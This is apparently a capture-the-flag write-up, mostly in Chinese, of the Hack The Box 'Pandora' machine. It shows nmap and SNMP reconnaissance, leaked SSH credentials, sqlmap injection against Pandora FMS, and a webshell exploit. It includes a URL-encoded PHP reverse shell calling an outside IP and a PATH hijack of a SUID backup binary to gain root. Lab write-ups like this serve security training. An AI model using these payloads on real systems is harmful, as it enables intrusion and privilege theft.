Try   HackMD

Pandora

Overall

Used Skill

  • nmap UDP scan
  • webshell
  • exploit suid file
  • hijack command

Rating

  • ⭐⭐⭐⭐⭐☆☆☆☆☆

Recon

nmap

  • 80 port 上只有一個看起來是靜態頁面的東西,footer 有個看似 Host name 的 panda.htb
~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.136            
[sudo] password for eethan1: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 14:22 CST
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 41.31% done; ETC: 14:23 (0:00:09 remaining)
Stats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 14:23 (0:00:00 remaining)
Nmap scan report for 10.10.11.136
Host is up (0.41s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/28%OT=22%CT=1%CU=38457%PV=Y%DS=2%DC=T%G=Y%TM=6241548
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 995/tcp)
HOP RTT       ADDRESS
1   411.40 ms 10.10.14.1
2   411.19 ms 10.10.11.136
  • 改作 UDP 掃描,找到 snmp 服務
~$ sudo nmap -sU -top-ports=30 panda.htb  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 14:50 CST
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.41s latency).
Not shown: 28 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp

sqlmap

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

  • 首頁有個可以送訊息的表格,填完後發 GET http://panda.htb/?fullName=q&email=q%40e&phone=q&message=q,試著 sqlmap sqlmap -u http://10.10.11.136/\?fullName\=%27\&email\=%27%40q\&phone\=%27\&message\=%27 沒掃出東西

path brute

  • 試著掃描子路徑 gobuster dir -u http://10.10.11.136 -w ~/Documents/wordlists/rockyou.txt 沒什麼東西

Get Shell

  • snmpwalk -v 1 -c public 10.10.11.136 > snmp.txt 找到一組username daniel 和 password HotelBabylon23

    Image Not Showing Possible Reasons
    • The image was uploaded to a note which you don't have access to
    • The note which the image was originally uploaded to has been deleted
    Learn More →

  • ssh 登入後,發現 flag 在另一個 user 底下

daniel@pandora:~$ find / -name "user.txt" 2> /dev/null
/home/matt/user.txt

  • 查看 apache 設定,找到 pandora.panda.htb

    Image Not Showing Possible Reasons
    • The image was uploaded to a note which you don't have access to
    • The note which the image was originally uploaded to has been deleted
    Learn More →

  • 本機戳 pandora.panda.htb 不會到正確的 virtual host,要在 box 裡戳(不知道為啥)

  • 掛代理 ssh -D 8080 daniel@panda.htb

  • 本地看是一個 pandora fms 服務,參考 Pandora FMS 742: Critical Code Vulnerabilities Explained,有 SQLI 可利用

$ proxychains sqlmap -u http://pandora.panda.htb/pandora_console/include/chart_generator.php\?session_id\=a -D pandora -T tsessions_php --dump
...
| eteshmpp2shihhj56vgn02jh54 | NULL                                                | 1648459740  |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                            | 1641200284  |
| f609b4t5s8qvv9leh4l9m8opf1 | NULL                                                | 1648459733  |
| fgrsvg6mpb4qe2pifr5knpq8bk | NULL                                                | 1648459629  |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                | 1638786504  |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                | 1638786762  |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                            | 1638783230  |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349  |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                | 1638786349  |
  • 手動拿 session 變成 matt 還不夠,另一個 exploit 透過 SQLI 寫 admin session
# 要在 /etc/hosts 把 pandora.panda.htb 設 127.0.0.1
tmp$ proxychains python sqlpwn.py -t pandora.panda.htb 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
URL:  http://pandora.panda.htb/pandora_console
[+] Sending Injection Payload
[proxychains] Strict chain  ...  127.0.0.1:8080  ...  127.0.0.1:80  ...  OK
[+] Requesting Session
[+] Admin Session Cookie : 1apq13c1m2t5oiie253scsm2ur
[+] Sending Payload 
[proxychains] Strict chain  ...  127.0.0.1:8080  ...  127.0.0.1:80  ...  OK
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://pandora.panda.htb/pandora_console/images/pwn.php?test=
CMD >
  • 這個 exploit 基本上還是 webshell ,但不知道為啥彈不了 shell,後來翻 code 找到 webshell 位置用瀏覽器開就能彈了,因為 cmd 的部分是直接拼接,可能urlencode沒處理好 http://pandora.panda.htb/pandora_console/images/pwn.php?test=php%20-r%20%27%24sock%3Dfsockopen(%2210.10.14.30%22%2C%2031596%20)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27

Privilege Escalation

  • 找 suid file ,拿到正常的 shell
tmp$ nc -nvlp 31596                      
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::31596
Ncat: Listening on 0.0.0.0:31596
Ncat: Connection from 10.10.11.136.
Ncat: Connection from 10.10.11.136:46924.
/bin/sh: 0: can't access tty; job control turned off

$ python3 -c 'import pty;pty.spawn("/bin/bash")' 

matt@pandora:/var/www/pandora/pandora_console/images$ find / -perm -u=s -type f 2>/dev/null
<nsole/images$ find / -perm -u=s -type f 2>/dev/null  
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1

# 此時 shell 是受限的
matt@pandora:/var/www/pandora/pandora_console/images$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
<(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null  
warning: commands will be executed using /bin/sh
job 8 at Mon Mar 28 14:19:00 2022
/bin/sh: 0: can't access tty; job control turned off

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
matt@pandora:/var/www/pandora/pandora_console/images$
  • pandora_backup 是一個 binary 檔案,直接跑看起來在備份,用 ltrace 看他跑了什麼
matt@pandora:/var/www/pandora/pandora_console/images$ ltrace pandora_backup
ltrace pandora_backup
getuid()                                         = 1000
geteuid()                                        = 1000
setreuid(1000, 1000)                             = 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility
)                = 26
puts("Now attempting to backup Pandora"...Now attempting to backup PandoraFMS client
)      = 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
)     = 39
+++ exited (status 1) +++
  • 有個 tar 指令可以劫持,成功拿 root
matt@pandora:/tmp$ echo "/bin/bash" > tar
echo "/bin/bash" > tar
matt@pandora:/tmp$ chmod 777 tar
chmod 777 tar
matt@pandora:/tmp$ PATH=.:$PATH
PATH=.:$PATH
matt@pandora:/tmp$ pandora_backup
pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp#
Last changed by 
gin
0
192

Read more

XSS 筆記

:::spoiler TOC ::: Spec &amp; source code refhttps://blog.huli.tw/2022/04/24/script-type/ sourcegraph: search source code chromium source code

Feb 5, 2025
HTML

:::spoiler TOC ::: 工具 jsbin: 快速測試 HTML Living Standar - 8 Web application APIs multipage 和 one-page 內容有出入

Feb 5, 2025
php

:::spoiler TOC ::: :::spoiler 待整理 [ ] http://www.madchat.fr/coding/php/secu/ ::: PHP

Jan 15, 2025
SQLI 筆記

SQL Injection :::spoiler 目錄 ::: PayloadsAllTheThings/SQL Injection sqlmap usage mssqlserver

Aug 26, 2024
Read more from gin
Published on HackMD